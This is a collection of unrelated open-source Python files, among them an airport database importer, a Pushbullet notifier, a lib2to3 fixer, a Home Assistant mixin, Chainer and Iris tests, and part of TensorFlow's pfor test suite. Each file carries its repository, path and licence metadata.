near_airport = Airport.query() \
.filter(and_(Airport.short_name == airport_w2k.short_name,
Airport.country_code == airport_w2k.country_code)) \
.filter(or_(Airport.valid_until == None, Airport.valid_until > self.current_date)) \
.first()
# fall back to location-search if airport is not found
# and only reuse this airport if it's within 250 meters of the old one...
if near_airport is None or near_airport.distance(airport_w2k) > 250:
near_airport = Airport.by_location(airport_w2k, distance_threshold=0.0025)
if near_airport is None:
# this airport is not in our database yet. add it...
self.add_airport(airport_w2k)
else:
# seems to be the same airport. update with current values
self.show_differences(near_airport, airport_w2k)
self.update_airport(near_airport, airport_w2k)
db.session.flush()
# now invalidate all remaining airports
invalid_airports = Airport.query() \
.filter(Airport.time_modified < self.current_date) \
.filter(or_(Airport.valid_until == None, Airport.valid_until > self.current_date))
for airport in invalid_airports:
print "{} {} {}" \
.format(airport.country_code, airport.name, airport.icao)
print " invalidated"
airport.valid_until = self.current_date
if commit:
db.session.commit()
def add_airport(self, airport_w2k):
airport = Airport()
self.update_airport(airport, airport_w2k)
db.session.add(airport)
def update_airport(self, airport, airport_w2k):
airport.location = airport_w2k
airport.altitude = airport_w2k.altitude
airport.name = airport_w2k.name
airport.short_name = airport_w2k.short_name
airport.icao = airport_w2k.icao
airport.country_code = airport_w2k.country_code
airport.surface = airport_w2k.surface
airport.runway_len = airport_w2k.runway_len
airport.runway_dir = airport_w2k.runway_dir
airport.frequency = airport_w2k.freq
airport.type = airport_w2k.type
airport.time_modified = self.current_date
def show_differences(self, airport, airport_w2k):
def row2dict(r):
return {c.name: getattr(r, c.name) for c in r.__table__.columns}
diff = DictDiffer(row2dict(airport), airport_w2k.__dict__)
changed = diff.changed()
distance = airport.distance(airport_w2k)
if changed or distance > 0.1:
print "{} {} {}" \
.format(airport.country_code, airport.name, airport.icao)
if distance > 0.1:
print " moved by {}m".format(distance)
for item in changed:
print " {} from {} to {}" \
.format(item, row2dict(airport)[item], airport_w2k.__dict__[item])
class DictDiffer(object):
"""
Calculate the difference between two dictionaries as:
(1) items added
(2) items removed
(3) keys same in both but changed values
(4) keys same in both and unchanged values
"""
def __init__(self, current_dict, past_dict):
self.current_dict, self.past_dict = current_dict, past_dict
self.set_current, self.set_past = set(current_dict.keys()), set(past_dict.keys())
self.intersect = self.set_current.intersection(self.set_past)
def added(self):
return self.set_current - self.intersect
def removed(self):
return self.set_past - self.intersect
def changed(self):
return set(o for o in self.intersect if self.past_dict[o] != self.current_dict[o])
def unchanged(self):
return set(o for o in self.intersect if self.past_dict[o] == self.current_dict[o])
| shadowoneau/skylines | skylines/commands/import_/welt2000.py | Python | agpl-3.0 | 5,171 |
from couchpotato.core.helpers.encoding import toUnicode
from couchpotato.core.helpers.variable import tryInt
from couchpotato.core.logger import CPLog
from couchpotato.core.notifications.base import Notification
import base64
import json
log = CPLog(__name__)
class Pushbullet(Notification):
url = 'https://api.pushbullet.com/api/%s'
def notify(self, message = '', data = None, listener = None):
if not data: data = {}
devices = self.getDevices()
if devices is None:
return False
# Get all the device IDs linked to this user
if not len(devices):
response = self.request('devices')
if not response:
return False
devices += [device.get('id') for device in response['devices']]
successful = 0
for device in devices:
response = self.request(
'pushes',
cache = False,
device_id = device,
type = 'note',
title = self.default_title,
body = toUnicode(message)
)
if response:
successful += 1
else:
log.error('Unable to push notification to Pushbullet device with ID %s' % device)
return successful == len(devices)
def getDevices(self):
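        # Illustrative note: a configured value of "12, 34" yields [12, 34];
        # any entry that is not an integer logs an error and makes this
        # method return None.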
devices = [d.strip() for d in self.conf('devices').split(',')]
# Remove empty items
devices = [d for d in devices if len(d)]
# Break on any ids that aren't integers
valid_devices = []
for device_id in devices:
d = tryInt(device_id, None)
if not d:
log.error('Device ID "%s" is not valid', device_id)
return None
valid_devices.append(d)
return valid_devices
def request(self, method, cache = True, **kwargs):
try:
base64string = base64.encodestring('%s:' % self.conf('api_key'))[:-1]
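            # Illustrative: for an API key "apikey" this is "YXBpa2V5Og==",
            # i.e. base64("apikey:") with the trailing newline added by
            # encodestring stripped off by the [:-1] slice.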
headers = {
"Authorization": "Basic %s" % base64string
}
if cache:
return self.getJsonData(self.url % method, headers = headers, data = kwargs)
else:
data = self.urlopen(self.url % method, headers = headers, data = kwargs)
return json.loads(data)
except Exception, ex:
log.error('Pushbullet request failed')
log.debug(ex)
return None
| rooi/CouchPotatoServer | couchpotato/core/notifications/pushbullet/main.py | Python | gpl-3.0 | 2,483 |
# uncompyle6 version 2.9.10
# Python bytecode 2.7 (62211)
# Decompiled from: Python 3.6.0b2 (default, Oct 11 2016, 05:27:10)
# [GCC 6.2.0 20161005]
# Embedded file name: fix_standarderror.py
"""Fixer for StandardError -> Exception."""
from .. import fixer_base
from ..fixer_util import Name
class FixStandarderror(fixer_base.BaseFix):
BM_compatible = True
PATTERN = "\n 'StandardError'\n "
def transform(self, node, results):
return Name('Exception', prefix=node.prefix) | DarthMaulware/EquationGroupLeaks | Leak #5 - Lost In Translation/windows/Resources/Python/Core/Lib/lib2to3/fixes/fix_standarderror.py | Python | unlicense | 519 |
import _plotly_utils.basevalidators
class CmidValidator(_plotly_utils.basevalidators.NumberValidator):
def __init__(
self, plotly_name="cmid", parent_name="scatterpolargl.marker", **kwargs
):
super(CmidValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "calc"),
implied_edits=kwargs.pop("implied_edits", {}),
**kwargs
)
| plotly/plotly.py | packages/python/plotly/plotly/validators/scatterpolargl/marker/_cmid.py | Python | mit | 474 |
from typing import List
from hwtHls.netlist.nodes.io import HlsNetNodeExplicitSync, HlsNetNodeRead, HlsNetNodeWrite
from hwtHls.netlist.nodes.node import HlsNetNode
from hwtHls.netlist.transformation.hlsNetlistPass import HlsNetlistPass
from itertools import chain
class HlsNetlistPassMergeExplicitSync(HlsNetlistPass):
"""
Merge nodes with explicit synchronization (HlsNetNodeRead, HlsNetNodeWrite, HlsNetNodeExplicitSync) together
if possible to reduce the number of places where we need to solve the synchronisation.
"""
@staticmethod
def _apply(nodes: List[HlsNetNode]):
to_rm = set()
for n in nodes:
if n not in to_rm and n.__class__ is HlsNetNodeExplicitSync:
n: HlsNetNodeExplicitSync
dep0 = n.dependsOn[0].obj
# merge sync to previous object if possible
if isinstance(dep0, HlsNetNodeRead) and len(dep0.usedBy[0]) == 1:
# check if we did not generate cycle because sync was dependent on value of previous read
dep0: HlsNetNodeRead
if n.extraCond is not None:
n.extraCond.obj.usedBy[n.extraCond.out_i].remove(n._inputs[n.extraCond_inI])
dep0.add_control_extraCond(n.extraCond)
if n.skipWhen is not None:
n.skipWhen.obj.usedBy[n.skipWhen.out_i].remove(n._inputs[n.skipWhen_inI])
dep0.add_control_skipWhen(n.skipWhen)
for orderIn in n.iterOrderingInputs():
orderDep = n.dependsOn[orderIn.in_i]
if orderDep is not dep0 and not any(depOfDep is orderDep for depOfDep in orderDep.obj.dependsOn):
orderIn.obj = dep0
orderIn.in_i = len(dep0._inputs)
dep0._inputs.append(orderIn)
dep0.dependsOn.append(orderDep)
                    # transfer output from this HlsNetNodeExplicitSync to HlsNetNodeRead (to avoid modification of potentially unknown objects behind HlsNetNodeExplicitSync)
dep0._outputs = n._outputs
for o in dep0._outputs:
o.obj = dep0
assert len(n.usedBy) == 2, (n, n.usedBy)
assert len(dep0.usedBy) == 2, (n, dep0.usedBy)
dep0.usedBy[0] = n.usedBy[0]
dep0.usedBy[1] = list(use for use in chain(dep0.usedBy[1], n.usedBy[1]) if use.obj is not n or dep0)
to_rm.add(n)
else:
# merge this node into successor if possible
sucs, order = n.usedBy
if len(sucs) == 1:
suc0 = sucs[0].obj
if isinstance(suc0, HlsNetNodeExplicitSync):
raise NotImplementedError()
elif isinstance(suc0, HlsNetNodeWrite):
raise NotImplementedError()
if to_rm:
nodes[:] = [
n for n in nodes
if (n not in to_rm)
]
def apply(self, hls: "HlsStreamProc", to_hw: "SsaSegmentToHwPipeline"):
self._apply(to_hw.hls.nodes)
| Nic30/hwtHls | hwtHls/netlist/transformation/mergeExplicitSync.py | Python | mit | 3,384 |
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-TODAY OpenERP s.a. (<http://www.openerp.com>).
# Copyright (C) 2012-TODAY Mentis d.o.o. (<http://www.mentis.si/openerp>)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Purchase Landing Costs',
'version': '1.1',
'category': 'Warehouse Management',
'description': """
        This module extends the average price computation with the definition of landing costs.
        Landed costs can be defined on purchase orders and/or stock pickings
        and are distributed using either the per-value or the per-unit method.
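        For example (illustrative figures only): a 100.00 landing cost distributed with the
        per-unit method over a receipt of 4 units adds 25.00 to the cost of each unit, while
        the per-value method splits the cost in proportion to each line's value.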
""",
'author': 'Mentis d.o.o.',
'depends': ['purchase'],
'init_xml': [],
'update_xml': ['security/ir.model.access.csv',
'product_template_view.xml',
'purchase_order_view.xml',
'stock_picking_in_view.xml',
#'stock_move_landing_costs_view.xml',
],
'demo_xml': [],
'installable': True,
'active': False,
}
| codeback/openerp-purchase_landing_costs | __openerp__.py | Python | agpl-3.0 | 1,849 |
"""Mixin class for handling connection state changes."""
import logging
from homeassistant.helpers.event import async_call_later
_LOGGER = logging.getLogger(__name__)
TIME_MARK_DISCONNECTED = 10  # seconds to wait before marking the entity unavailable
class ConnectionStateMixin:
"""Base implementation for connection state handling."""
def __init__(self):
"""Initialize this mixin instance."""
super().__init__()
self._unsub_mark_disconnected = None
async def got_connected(self, _=None):
"""Notification that we're connected to the HUB."""
_LOGGER.debug("%s: connected to the HUB", self._name)
self.async_write_ha_state()
self._clear_disconnection_delay()
async def got_disconnected(self, _=None):
"""Notification that we're disconnected from the HUB."""
_LOGGER.debug("%s: disconnected from the HUB", self._name)
# We're going to wait for 10 seconds before announcing we're
# unavailable, this to allow a reconnection to happen.
self._unsub_mark_disconnected = async_call_later(
self.hass, TIME_MARK_DISCONNECTED, self._mark_disconnected_if_unavailable
)
def _clear_disconnection_delay(self):
if self._unsub_mark_disconnected:
self._unsub_mark_disconnected()
self._unsub_mark_disconnected = None
def _mark_disconnected_if_unavailable(self, _):
self._unsub_mark_disconnected = None
if not self.available:
# Still disconnected. Let the state engine know.
self.async_write_ha_state()
| partofthething/home-assistant | homeassistant/components/harmony/connection_state.py | Python | apache-2.0 | 1,550 |
"""
Helper file to manage translations for the Meerkat Authentication module.
We have two types of translations: general and implementation-specific.
The general translations are extracted from the Python, Jinja2 and JS files.
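Typical invocations (the language code below is only an example):
    python translate.py update-po
    python translate.py initialise -l fr
    python translate.py compile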
"""
from csv import DictReader
import argparse
import os
import shutil
import datetime
from babel.messages.pofile import read_po, write_po
from babel.messages.catalog import Catalog, Message
from babel._compat import BytesIO
parser = argparse.ArgumentParser()
parser.add_argument("action",
choices=["update-po", "initialise", "compile" ],
help="Choose action" )
parser.add_argument("-l", type=str,
help="Two letter langauge code")
if __name__ == "__main__":
args = parser.parse_args()
lang_dir = "meerkat_auth"
if args.action == "update-po":
os.system("pybabel extract -F babel.cfg -o {}/messages.pot .".format(lang_dir) )
os.system("pybabel update -i {}/messages.pot -d {}/translations".format(lang_dir, lang_dir) )
os.system("rm {}/messages.pot".format(lang_dir))
elif args.action == "initialise":
if args.l and len(args.l) == 2:
os.system("pybabel extract -F babel.cfg -o {}/messages.pot .".format(lang_dir) )
os.system("pybabel init -i {}/messages.pot -d {}/translations -l {}".format(
lang_dir, lang_dir,args.l
))
os.system("pybabel update -i {}/messages.pot -d {}/translations".format(lang_dir, lang_dir) )
os.system("rm {}/messages.pot".format(lang_dir))
else:
print("Need to specify a two letter language code")
elif args.action == "compile":
os.system("pybabel compile -d {}/translations".format(lang_dir))
| meerkat-code/meerkat_auth | translate.py | Python | mit | 1,780 |
import unittest
import numpy
import chainer
from chainer import cuda
from chainer import functions
from chainer import gradient_check
from chainer.testing import attr
from chainer.testing import condition
if cuda.available:
cuda.init()
class TestNonparameterizedConvolution2D(unittest.TestCase):
def setUp(self, use_cudnn=True):
in_channels = 3
out_channels = 2
kh, kw = (3, 3)
self.stride = 2
self.pad = 1
self.use_cudnn = use_cudnn
self.W = numpy.random.normal(
0, numpy.sqrt(1. / (kh * kw * in_channels)),
(out_channels, in_channels, kh, kw)).astype(numpy.float32)
self.b = numpy.random.uniform(
-1, 1, out_channels).astype(numpy.float32)
self.x = numpy.random.uniform(-1, 1,
(2, 3, 4, 3)).astype(numpy.float32)
self.gy = numpy.random.uniform(-1, 1,
(2, 2, 2, 2)).astype(numpy.float32)
@attr.cudnn
def test_forward_consistency(self):
x_cpu = chainer.Variable(self.x)
W_cpu = chainer.Variable(self.W)
b_cpu = chainer.Variable(self.b)
y_cpu = functions.convolution_2d(
x_cpu, W_cpu, b_cpu, stride=self.stride, pad=self.pad,
use_cudnn=self.use_cudnn)
x_gpu = chainer.Variable(cuda.to_gpu(self.x))
W_gpu = chainer.Variable(cuda.to_gpu(self.W))
b_gpu = chainer.Variable(cuda.to_gpu(self.b))
y_gpu = functions.convolution_2d(
x_gpu, W_gpu, b_gpu, stride=self.stride, pad=self.pad,
use_cudnn=self.use_cudnn)
gradient_check.assert_allclose(y_cpu.data, y_gpu.data.get())
@attr.gpu
def test_forward_consistency_im2col(self):
self.use_cudnn = False
self.test_forward_consistency()
def check_backward(self, x_data, W_data, b_data, y_grad):
x = chainer.Variable(x_data)
W = chainer.Variable(W_data)
b = chainer.Variable(b_data)
y = functions.convolution_2d(x, W, b, stride=self.stride, pad=self.pad,
use_cudnn=self.use_cudnn)
y.grad = y_grad
y.backward()
func = y.creator
f = lambda: func.forward((x.data, W.data, b.data))
gx, gW, gb = gradient_check.numerical_grad(
f, (x.data, W.data, b.data), (y.grad,), eps=1e-2)
gradient_check.assert_allclose(gx, x.grad)
gradient_check.assert_allclose(gW, W.grad)
gradient_check.assert_allclose(gb, b.grad)
@condition.retry(3)
def test_backward_cpu(self):
self.check_backward(self.x, self.W, self.b, self.gy)
@attr.cudnn
@condition.retry(3)
def test_backward_gpu(self):
self.check_backward(cuda.to_gpu(self.x), cuda.to_gpu(self.W),
cuda.to_gpu(self.b), cuda.to_gpu(self.gy))
@attr.gpu
@condition.retry(3)
def test_backward_gpu_im2col(self):
self.use_cudnn = False
self.test_backward_gpu()
| tereka114/chainer | tests/functions_tests/test_nonparameterized_convolution_2d.py | Python | mit | 3,032 |
# (C) British Crown Copyright 2012 - 2014, Met Office
#
# This file is part of Iris.
#
# Iris is free software: you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by the
# Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Iris is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Iris. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
# import iris tests first so that some things can be initialised before
# importing anything else
import iris.tests as tests
import numpy as np
import iris
import iris.fileformats.abf
@tests.skip_data
class TestAbfLoad(tests.IrisTest):
def setUp(self):
self.path = tests.get_data_path(('abf', 'AVHRRBUVI01.1985apra.abf'))
def test_load(self):
cubes = iris.load(self.path)
# On a 32-bit platform the time coordinate will have 32-bit integers.
# We force them to 64-bit to ensure consistent test results.
time_coord = cubes[0].coord("time")
time_coord.points = np.array(time_coord.points, dtype=np.int64)
time_coord.bounds = np.array(time_coord.bounds, dtype=np.int64)
# Normalise the different array orders returned by version 1.6
# and 1.7 of NumPy.
cubes[0].data = cubes[0].data.copy(order='C')
self.assertCML(cubes, ("abf", "load.cml"))
def test_fill_value(self):
field = iris.fileformats.abf.ABFField(self.path)
# Make sure the fill value is appropriate. It must avoid the
# data range (0 to 100 inclusive) but still fit within the dtype
# range (0 to 255 inclusive).
self.assertGreater(field.data.fill_value, 100)
self.assertLess(field.data.fill_value, 256)
if __name__ == '__main__':
tests.main()
| Jozhogg/iris | lib/iris/tests/test_abf.py | Python | lgpl-3.0 | 2,149 |
# pylint: disable=unicode-format-string
"""
Defines the URL routes for this app.
NOTE: These views are deprecated. These routes are superseded by
``/api/user/v1/accounts/{username}/image``, found in
``openedx.core.djangoapps.user_api.urls``.
"""
# pylint: enable=unicode-format-string
from __future__ import absolute_import
from django.conf import settings
from django.conf.urls import url
from .views import ProfileImageRemoveView, ProfileImageUploadView
urlpatterns = [
url(
r'^v1/' + settings.USERNAME_PATTERN + '/upload$',
ProfileImageUploadView.as_view(),
name="profile_image_upload"
),
url(
r'^v1/' + settings.USERNAME_PATTERN + '/remove$',
ProfileImageRemoveView.as_view(),
name="profile_image_remove"
),
]
| ESOedX/edx-platform | openedx/core/djangoapps/profile_images/urls.py | Python | agpl-3.0 | 784 |
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for pfor and for_loop."""
# pylint: disable=g-direct-tensorflow-import
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import time
from absl.testing import parameterized
import numpy as np
from tensorflow.core.example import example_pb2
from tensorflow.core.example import feature_pb2
from tensorflow.python.client import session
from tensorflow.python.eager import backprop
from tensorflow.python.eager import def_function
from tensorflow.python.framework import config
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import indexed_slices
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import bitwise_ops
from tensorflow.python.ops import cond_v2
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import control_flow_v2_toggles
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import functional_ops
from tensorflow.python.ops import gen_list_ops
from tensorflow.python.ops import gen_nn_ops
from tensorflow.python.ops import gradient_checker_v2
from tensorflow.python.ops import gradients as gradient_ops
from tensorflow.python.ops import image_ops
from tensorflow.python.ops import list_ops
from tensorflow.python.ops import logging_ops
from tensorflow.python.ops import map_fn
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn
from tensorflow.python.ops import parsing_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import rnn
from tensorflow.python.ops import rnn_cell
from tensorflow.python.ops import stateless_random_ops
from tensorflow.python.ops import tensor_array_grad # pylint: disable=unused-import
from tensorflow.python.ops import tensor_array_ops
from tensorflow.python.ops import variables
from tensorflow.python.ops.parallel_for import control_flow_ops as pfor_control_flow_ops
from tensorflow.python.ops.parallel_for.test_util import PForTestCase
from tensorflow.python.ops.signal import fft_ops
from tensorflow.python.platform import test
from tensorflow.python.util import nest
@test_util.run_all_in_graph_and_eager_modes
@test_util.with_control_flow_v2
class PForTest(PForTestCase):
def test_op_conversion_fallback_to_while_loop(self):
# Note that we used top_k op for this test. If a converter gets defined for
# it, we will need to find another op for which a converter has not been
# defined.
x = random_ops.random_uniform([3, 2, 4])
def loop_fn(i):
x_i = array_ops.gather(x, i)
return nn.top_k(x_i)
with self.assertRaisesRegex(ValueError, "No pfor vectorization"):
self._test_loop_fn(loop_fn, 3, fallback_to_while_loop=False)
self._test_loop_fn(loop_fn, 3, fallback_to_while_loop=True)
def test_parallel_iterations(self):
for parallel_iterations in [2, 3, 8, 10]:
x = random_ops.random_uniform([8, 3])
# pylint: disable=cell-var-from-loop
def loop_fn(i):
return array_ops.gather(x, i)
# pylint: enable=cell-var-from-loop
self._test_loop_fn(loop_fn, 8, parallel_iterations=parallel_iterations)
self._test_loop_fn(
loop_fn,
4 * constant_op.constant(2),
parallel_iterations=parallel_iterations)
def test_parallel_iterations_zero(self):
with self.assertRaisesRegex(ValueError, "positive integer"):
pfor_control_flow_ops.pfor(lambda i: 1, 8, parallel_iterations=0)
with self.assertRaisesRegex(TypeError, "positive integer"):
pfor_control_flow_ops.for_loop(
lambda i: 1, dtypes.int32, 8, parallel_iterations=0)
def test_parallel_iterations_one(self):
with self.assertRaisesRegex(ValueError, "Use for_loop instead"):
pfor_control_flow_ops.pfor(lambda i: 1, 8, parallel_iterations=1)
def test_vectorized_map(self):
def compute(x):
return math_ops.reduce_mean(x, axis=0, keepdims=True)
result = pfor_control_flow_ops.vectorized_map(compute,
array_ops.ones((10, 5, 3)))
self.run_and_assert_equal(result, array_ops.ones((10, 1, 3)))
def test_vectorized_map_with_dynamic_shape(self):
def compute(x):
return math_ops.reduce_mean(x, axis=0, keepdims=True)
x = array_ops.placeholder_with_default(
array_ops.ones((10, 5, 3)), shape=None)
result = pfor_control_flow_ops.vectorized_map(compute, x)
self.run_and_assert_equal(result, array_ops.ones((10, 1, 3)))
def test_vectorized_map_broadcasts_unit_dimensions(self):
convert_with_static_shape = ops.convert_to_tensor
convert_with_dynamic_shape = (
lambda x: array_ops.placeholder_with_default(x, shape=None))
for convert in (convert_with_static_shape, convert_with_dynamic_shape):
a = convert([3.1])
b = convert([-2., 6., 9.])
# One elem with leading unit dimension.
a_plus_1 = pfor_control_flow_ops.vectorized_map(lambda a: a + 1, a)
self.assertAllEqual(*self.evaluate((a_plus_1, a + 1)))
# Two elems, both with leading unit dimension.
a_plus_a = pfor_control_flow_ops.vectorized_map(sum, (a, a))
self.assertAllEqual(*self.evaluate((a_plus_a, a + a)))
# Elem w/ unit dimension broadcast against elem with batch dim.
a_plus_b = pfor_control_flow_ops.vectorized_map(sum, (a, b))
self.assertAllEqual(*self.evaluate((a_plus_b, a + b)))
def test_vectorized_map_example_1(self):
def outer_product(a):
return math_ops.tensordot(a, a, 0)
batch_size = 100
a = array_ops.ones((batch_size, 32, 32))
c = pfor_control_flow_ops.vectorized_map(outer_product, a)
self.assertAllEqual((batch_size, 32, 32, 32, 32), c.shape)
def test_disable_tf_function(self):
def_function.run_functions_eagerly(True)
# vectorized_map should ignore disabling tf.functions
self.assertTrue(def_function.functions_run_eagerly())
self.assertAllEqual([0, 1, 4, 9],
pfor_control_flow_ops.vectorized_map(
lambda x: x * x, math_ops.range(4)))
self.assertTrue(def_function.functions_run_eagerly())
@test_util.run_all_in_graph_and_eager_modes
class IndexedSlicesTest(PForTestCase):
def test_indexed_slices(self):
def loop_fn(i):
return indexed_slices.IndexedSlices(
indices=i, values=array_ops.reshape(i, [1]), dense_shape=[3, 1])
self._test_loop_fn(loop_fn, 2)
def test_indexed_slices_components(self):
def loop_fn(i):
slices = indexed_slices.IndexedSlices(
indices=i, values=array_ops.reshape(i, [1]), dense_shape=[3, 1])
# Note that returning the components inside the slice avoids
# densification, which may be more efficient.
return slices.values, slices.indices
self._test_loop_fn(loop_fn, 2)
@test_util.run_all_in_graph_and_eager_modes
class ReductionTest(PForTestCase):
def test_reduce(self):
def reduce_fn(p, q):
return math_ops.reduce_mean(p + q, axis=0)
x = random_ops.random_uniform([4, 3, 2])
y = random_ops.random_uniform([4, 3, 2])
def loop_fn(i, pfor_config):
x_i = array_ops.gather(x, i)
y_i = array_ops.gather(y, i)
reduced = pfor_config.reduce(reduce_fn, x_i, y_i)
return reduced + x_i
output = pfor_control_flow_ops.pfor(loop_fn, 4)
ans = reduce_fn(x, y) + x
output_val, ans_val = self.evaluate([output, ans])
self.assertAllClose(ans_val, output_val)
def test_reduce_concat(self):
x = random_ops.random_uniform([8, 3])
def loop_fn(i, pfor_config):
x_i = array_ops.gather(x, i)
vectorized_value = pfor_config.reduce_concat(x_i)
mean_value = math_ops.reduce_mean(vectorized_value, axis=0)
return x_i - mean_value
output = pfor_control_flow_ops.pfor(loop_fn, 8)
ans = x - math_ops.reduce_mean(x, axis=0)
output_val, ans_val = self.evaluate([output, ans])
self.assertAllClose(ans_val, output_val)
def test_reduce_mean(self):
x = random_ops.random_uniform([8, 3])
def loop_fn(i, pfor_config):
x_i = array_ops.gather(x, i)
return x_i - pfor_config.reduce_mean(x_i)
output = pfor_control_flow_ops.pfor(loop_fn, 8)
ans = x - math_ops.reduce_mean(x, axis=0)
output_val, ans_val = self.evaluate([output, ans])
self.assertAllClose(ans_val, output_val)
def test_reduce_sum(self):
x = random_ops.random_uniform([8, 3])
def loop_fn(i, pfor_config):
x_i = array_ops.gather(x, i)
return x_i - pfor_config.reduce_sum(x_i)
output = pfor_control_flow_ops.pfor(loop_fn, 8)
ans = x - math_ops.reduce_sum(x, axis=0)
output_val, ans_val = self.evaluate([output, ans])
self.assertAllClose(ans_val, output_val)
def test_reduce_class(self):
x = random_ops.random_uniform([8, 3])
class LoopFn(object):
def __init__(self):
pass
def __call__(self, i, pfor_config):
x_i = array_ops.gather(x, i)
return x_i - pfor_config.reduce_mean(x_i)
output = pfor_control_flow_ops.pfor(LoopFn(), 8)
ans = x - math_ops.reduce_mean(x, axis=0)
output_val, ans_val = self.evaluate([output, ans])
self.assertAllClose(ans_val, output_val)
def test_reduce_functools_partial(self):
x = random_ops.random_uniform([8, 3])
def fn(i, pfor_config, dummy=None):
del dummy
x_i = array_ops.gather(x, i)
return x_i - pfor_config.reduce_mean(x_i)
loop_fn = functools.partial(fn, dummy=1)
output = pfor_control_flow_ops.pfor(loop_fn, 8)
ans = x - math_ops.reduce_mean(x, axis=0)
output_val, ans_val = self.evaluate([output, ans])
self.assertAllClose(ans_val, output_val)
def test_parallel_iterations(self):
x = random_ops.random_uniform([8, 3])
def loop_fn(i, pfor_config):
x_i = array_ops.gather(x, i)
return pfor_config.reduce_sum(x_i)
with self.assertRaisesRegex(ValueError,
"parallel_iterations currently unsupported"):
pfor_control_flow_ops.pfor(loop_fn, 8, parallel_iterations=2)
@test_util.run_all_in_graph_and_eager_modes
class BitwiseTest(PForTestCase):
def test_unary_cwise(self):
for op in [bitwise_ops.invert]:
x = random_ops.random_uniform([7, 3, 5], maxval=10, dtype=dtypes.int32)
# pylint: disable=cell-var-from-loop
def loop_fn(i):
x1 = array_ops.gather(x, i)
return op(x1)
# pylint: enable=cell-var-from-loop
self._test_loop_fn(loop_fn, 3)
def test_binary_cwise(self):
binary_ops = [
bitwise_ops.bitwise_and,
bitwise_ops.bitwise_or,
bitwise_ops.bitwise_xor,
bitwise_ops.left_shift,
bitwise_ops.right_shift,
]
for op in binary_ops:
x = random_ops.random_uniform([7, 3, 5], maxval=10, dtype=dtypes.int32)
y = random_ops.random_uniform([3, 5], maxval=10, dtype=dtypes.int32)
output_dtypes = []
# pylint: disable=cell-var-from-loop
def loop_fn(i):
x1 = array_ops.gather(x, i)
y1 = array_ops.gather(y, i)
outputs = [op(x, y), op(x1, y), op(x, y1), op(x1, y1), op(x1, x1)]
del output_dtypes[:]
output_dtypes.extend(t.dtype for t in outputs)
return outputs
# pylint: enable=cell-var-from-loop
self._test_loop_fn(loop_fn, 3)
@test_util.run_all_in_graph_and_eager_modes
class ImageTest(PForTestCase):
def test_adjust_contrast(self):
images = random_ops.random_uniform([3, 2, 4, 4, 3])
def loop_fn(i):
image = array_ops.gather(images, i)
return image_ops.adjust_contrast(image, 2.0)
self._test_loop_fn(loop_fn, 3)
def test_adjust_hue(self):
images = random_ops.random_uniform([3, 2, 4, 4, 3])
def loop_fn(i):
image = array_ops.gather(images, i)
return image_ops.adjust_hue(image, .25)
self._test_loop_fn(loop_fn, 3)
def test_adjust_saturation(self):
images = random_ops.random_uniform([3, 2, 4, 4, 3])
def loop_fn(i):
image = array_ops.gather(images, i)
return image_ops.adjust_saturation(image, 0.1)
self._test_loop_fn(loop_fn, 3)
@test_util.run_all_in_graph_and_eager_modes
class NNTest(PForTestCase):
def test_conv2d(self):
x = random_ops.random_uniform([3, 2, 12, 12, 3])
filt = random_ops.random_uniform([3, 3, 3, 7])
def loop_fn(i):
x1 = array_ops.gather(x, i)
return nn.conv2d(
x1, filt, strides=[1, 2, 2, 1], padding="VALID", data_format="NHWC")
self._test_loop_fn(loop_fn, 3)
def test_conv2d_backprop_input(self):
x_shape = [2, 12, 12, 3]
filt = random_ops.random_uniform([3, 3, 3, 7])
grad = random_ops.random_uniform([3, 2, 5, 5, 7])
def loop_fn(i):
grad1 = array_ops.gather(grad, i)
return nn.conv2d_backprop_input(
x_shape,
filt,
grad1,
strides=[1, 2, 2, 1],
padding="VALID",
data_format="NHWC")
self._test_loop_fn(loop_fn, 3)
def test_conv2d_backprop_filter(self):
x = random_ops.random_uniform([3, 2, 12, 12, 3])
x_0 = array_ops.gather(x, 0)
filter_sizes = [3, 3, 3, 7]
grad = random_ops.random_uniform([3, 2, 5, 5, 7])
def loop_fn(i):
x_i = array_ops.gather(x, i)
grad_i = array_ops.gather(grad, i)
return [
nn.conv2d_backprop_filter(
inp,
filter_sizes,
grad_i,
strides=[1, 2, 2, 1],
padding="VALID",
data_format="NHWC") for inp in [x_i, x_0]
]
self._test_loop_fn(loop_fn, 3)
def test_avg_pool(self):
with backprop.GradientTape(persistent=True) as g:
x = random_ops.random_uniform([3, 2, 12, 12, 3])
g.watch(x)
ksize = [1, 3, 3, 1]
